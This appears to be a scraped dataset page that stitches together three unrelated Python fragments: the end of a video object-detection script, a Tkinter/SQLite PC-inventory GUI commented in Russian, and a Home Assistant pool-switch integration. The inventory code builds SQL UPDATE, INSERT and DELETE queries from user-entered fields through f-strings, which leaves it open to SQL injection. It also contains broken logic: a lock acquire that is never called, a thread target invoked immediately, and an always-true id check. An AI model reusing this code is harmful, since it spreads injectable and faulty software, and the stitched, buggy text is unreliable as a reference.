if args.frame is not None and args.frame == frame_count:
break
else:
break
input_video.release()
output_video_writer.release()
# output_image_path = 'dog_bboxes.png'
# obj_detected_img.save(output_image_path, 'PNG')
# print('Saved image with bounding boxes of detected objects to {}.'.format(output_image_path))
if __name__ == '__main__':
main()
|
def clear_all_table():
clear_table(table_info)
clear_table(table_propertys)
clear_table(table_processes)
clear_table(table_services)
clear_table(table_programs)
clear_table(table_computers)
clear_table(table_hardwares)
def clear_all_wigets():
global selected_pc
selected_pc = ""
clear_listbox(computer_list)
clear_all_table()
entryes_clear()
enryes_state(DISABLED)
btn_save["state"] = DISABLED
btn_delete["state"] = DISABLED
def online_click(event):
global online
if online == False or online == None:
online = True
clear_all_wigets()
for pc in names_list:
name = pc[0]
computer_list.insert(END, name)
def offline_click(event):
global online
if online == True or online == None:
online = False
clear_all_wigets()
sqlite_connect = sqlite3.connect("netspc.db")
cursor = sqlite_connect.cursor()
pcs_names_query = '''
SELECT pc_name
FROM computers;
'''
cursor.execute(pcs_names_query)
db_names = cursor.fetchall()
names = list()
for name in db_names:
names.append(replace_dash_with_minus(name[0]))
del db_names, name
counter = len(names) - 1
while counter != - 1:
db_name = names[counter]
for pc_name in names_list:
if db_name == pc_name[0]:
names.pop(counter)
counter = counter - 1
offline = names
del names
for name in offline:
computer_list.insert(END, name)
def get_entryes_list():
entryes = [
first_db_entry,
second_db_entry,
third_db_entry,
fourth_db_entry,
fifth_db_entry
]
return entryes
def enryes_state(state):
# принимает значение DISABLE или NORMAL
# меняет статус эдитов на DISABLE или NORMAL
entryes = get_entryes_list()
for entry in entryes:
entry["state"] = state
def entryes_clear():
entryes = get_entryes_list()
for entry in entryes:
entry.delete(0, "end")
def all_tables():
tables = [
table_info,
table_propertys,
table_processes,
table_services,
table_programs,
table_computers,
table_hardwares
]
return tables
def delete_selections_in_others_tables(table):
# Снимает выделение со всех таблиц,
# кроме той, что передана в функцию
tables = all_tables()
for counter, item in enumerate(tables):
if item == table:
tables.pop(counter)
for item in tables:
if len(item.selection()) > 0:
item.selection_remove(item.selection()[0])
def table_computers_select(table):
if len(table.selection()) != 0:
global table_selected, old_id
table_selected = 1
enryes_state(NORMAL)
entryes_clear()
fourth_db_lable["text"] = ""
fourth_db_entry["state"] = DISABLED
btn_delete["state"] = DISABLED
btn_save["state"] = NORMAL
delete_selections_in_others_tables(table)
for selection in table.selection():
item = table.item(selection)
inventory_number, date_buy, room = item["values"][0: 3]
first_db_lable["text"] = "Id"
first_db_entry.insert(0, inventory_number)
old_id = inventory_number
second_db_lable["text"] = "Дата покупки"
second_db_entry.insert(0, date_buy)
third_db_lable["text"] = "Кабинет"
third_db_entry.insert(0, room)
def table_hardwares_select(table):
if len(table.selection()) != 0:
global table_selected
table_selected = 2
enryes_state(NORMAL)
btn_save["state"] = NORMAL
delete_selections_in_others_tables(table)
entryes_clear()
for selection in table.selection():
item = table.item(selection)
hardware, data_setting, repair, comment, id = item["values"][0: 5]
first_db_lable["text"] = "Устройство"
first_db_entry.insert(0, hardware)
second_db_lable["text"] = "Дата установки"
second_db_entry.insert(0, data_setting)
third_db_lable["text"] = "Ремонт"
third_db_entry.insert(0, repair)
fourth_db_lable["text"] = "Коментарий"
fourth_db_entry.insert(0, comment)
fifth_db_entry.insert(0, id)
if id == "None":
btn_delete["state"] = DISABLED
else:
btn_delete["state"] = NORMAL
def sqlite_erorr(error):
messagebox.showwarning("Ошибка при подключении к sqlite ", error)
def save(event):
if event.widget.cget("state") == "normal":
try:
sqlite_connection = sqlite3.connect("netspc.db")
cursor = sqlite_connection.cursor()
pc_name = replace_minus_with_dash(selected_pc)
if table_selected == 1:
inventory_number = first_db_entry.get()
date_buy = second_db_entry.get()
room = third_db_entry.get()
query = f'''
UPDATE computers
SET inventory_number={inventory_number},
date_buy='{date_buy}',
room='{room}',
pc_name='{pc_name}'
WHERE inventory_number={old_id};
'''
elif table_selected == 2:
hardware = first_db_entry.get()
data_setting = second_db_entry.get()
repair = third_db_entry.get()
comment = fourth_db_entry.get()
id = fifth_db_entry.get()
if id == "None" or id == "":
query = f'''
INSERT INTO hardwares
(hardware,
data_setting,
repair,
comment,
pc_name)
VALUES (
'{hardware}',
'{data_setting}',
'{repair}',
'{comment}',
'{pc_name}');
'''
else:
query = f'''
UPDATE hardwares
SET hardware='{hardware}',
data_setting='{data_setting}',
repair='{repair}',
comment='{comment}',
pc_name='{pc_name}'
WHERE id={id};
'''
cursor.execute(query)
sqlite_connection.commit()
cursor.close()
except sqlite3.Error as error:
sqlite_erorr(error)
finally:
if (sqlite_connection):
sqlite_connection.close()
print("Соединение с SQLite закрыто")
database_get_pc()
def delete(event):
if event.widget.cget("state") == "normal":
try:
sqlite_connection = sqlite3.connect("netspc.db")
cursor = sqlite_connection.cursor()
if table_selected == 2:
id = fifth_db_entry.get()
if id != "None" or id != "":
query = f'''
DELETE FROM hardwares
WHERE id={id};
'''
cursor.execute(query)
sqlite_connection.commit()
cursor.close()
except sqlite3.Error as error:
sqlite_erorr(error)
finally:
if (sqlite_connection):
sqlite_connection.close()
print("Соединение с SQLite закрыто")
database_get_pc()
def name_select(event):
global updated, selected_pc
pc_name = chosen_name(computer_list)
if select_pс(pc_name) or is_update(updated, pc_name):
clear_all_table()
if (select_pс(pc_name) or is_update(updated, pc_name)) and pc_name != "":
client_pc = get_pc(pc_name)
selected_pc = pc_name
# информация о ПК
for key, item in client_pc.items():
table_info.insert("", END, values=(key, item))
if key == "available_ram":
del key, item
break
# свойства ПК
table_propertys.insert("", END, values=(
"Загрузка процессора", client_pc["cpu_usage"]))
table_propertys.insert("", END, values=(
"Загрузка памяти", client_pc["ram_usage"]))
table_propertys.insert("", END, values=(
"Загрузка диска", client_pc["disk_usage"]))
# процессы
for process in client_pc["processes"]:
table_processes.insert("", END, values=(process))
# службы
for servise in client_pc["services"]:
table_services.insert("", END, values=(servise))
# программы
for program in client_pc["programs"]:
table_programs.insert("", END, values=(program))
updated.update({pc_name: False})
database_get_pc()
def thread_name_select(event):
thread_name_select = Thread(
target=name_select, args=[event], daemon=True)
thread_name_select.start()
def thread_get_names_list():
global names_list
lock = Lock()
lock.acquire()
try:
names_list = get_names_list(ip_addresses)
if len(names_list) != 0:
clear_listbox(computer_list)
fill_listbox(computer_list, names_list)
fill_tables()
finally:
lock.release()
print(f"Names PC in my network {len(names_list)}: {str(names_list)}")
def thread_send_command(command, table):
lock = Lock()
lock.acquire
thread_send = Thread(target=send_command(command, table), daemon=True)
thread_send.start()
lock.release()
|
"""Support for Vista Pool switches"""
import logging
from homeassistant.helpers.entity import ToggleEntity
from homeassistant.const import CONF_USERNAME
from .vistapool_entity import VistaPoolEntity
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Old way."""
async def async_setup_entry(hass, config_entry, async_add_entities):
sensors = []
account = config_entry.data.get(CONF_USERNAME)
vistaPoolData = hass.data[DOMAIN][account]
for config_pool in vistaPoolData.config_pools:
for switch in config_pool.switches:
sensors.append(VistaPoolSwitch(config_pool, switch))
async_add_entities(sensors)
class VistaPoolSwitch(VistaPoolEntity, ToggleEntity):
"""Representation of a Vista Pool switch."""
@property
def is_on(self):
"""Return true if switch is on."""
return self._instrument.state
async def async_turn_on(self, **kwargs):
"""Turn the switch on."""
await self._instrument.turn_on()
async def async_turn_off(self, **kwargs):
"""Turn the switch off."""
await self._instrument.turn_off()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.